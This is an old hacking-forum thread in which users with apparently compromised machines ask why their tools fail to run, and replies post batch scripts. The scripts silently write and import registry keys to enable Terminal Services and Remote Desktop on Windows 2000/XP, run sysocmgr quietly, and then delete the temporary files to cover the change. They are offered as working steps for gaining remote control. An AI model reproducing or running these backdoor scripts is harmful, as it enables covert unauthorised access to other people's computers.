RizL4
Apr 27 2004, 03:09 PM
hi there has anyone have trouble excuteing your files with this coz only some execute on mine just wanted too see if its just me thanxs
Nick
Apr 27 2004, 08:40 PM
it can execute but 90 times on 100 u have a firewall blocking your toolz i think. if anyone have a solution for all the bad luck with outbound

)
Macsou
Apr 28 2004, 01:38 PM
Your can execute your Files In remote Desktop , it's more easy .
To start the Terminal Service :
| CODE |
echo Windows Registry Editor Version 5.00> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg echo "Start"=dword:00000002>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>C:\TS.REG echo "EnableAdminTSRemote"=dword:00000001>>C:\TS.REG echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>C:\TS.REG echo "TSEnabled"=dword:00000001>>C:\TS.REG echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>C:\TS.REG echo "Start"=dword:00000002>>C:\TS.REG REGEDIT /S C:\TS.REG echo [Components] > c:\bootlog~.txt echo TSEnabled = on >> c:\bootlog~.txt sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q DEL /Q c:\TS.REG DEL /Q c:\bootlog~.txt EXIT
|
This is 4 Windows 2000 . But You can try : REGEDIT32 /S C:\TS.REG at the place of : REGEDIT /S C:\TS.REG
Nova
Apr 28 2004, 02:17 PM
Macsou is this 2000 or XP, i have been using code i think i picked up here, but on some machines its not working, ?
| CODE |
echo Windows Registry Editor Version 5.00> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg echo "fAllowToGetHelp"=dword:00000000>> c:\TS.reg
regedit /s c:\TS.reg
del c:\TS.reg |
tweakz20
Apr 28 2004, 10:41 PM
you might have version problems because of the first line; echo Windows Registry Editor Version 5.00> c:\TS.reg
i know 2k (latest updates) uses v. 5.00, don't know about XP... don't know if it makes a difference though
we could help more if you would give an error message or something like that?
Crazycold
Apr 30 2004, 02:48 PM
ok, i have done it, but now? how i will get the remote desktop what i have to do?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.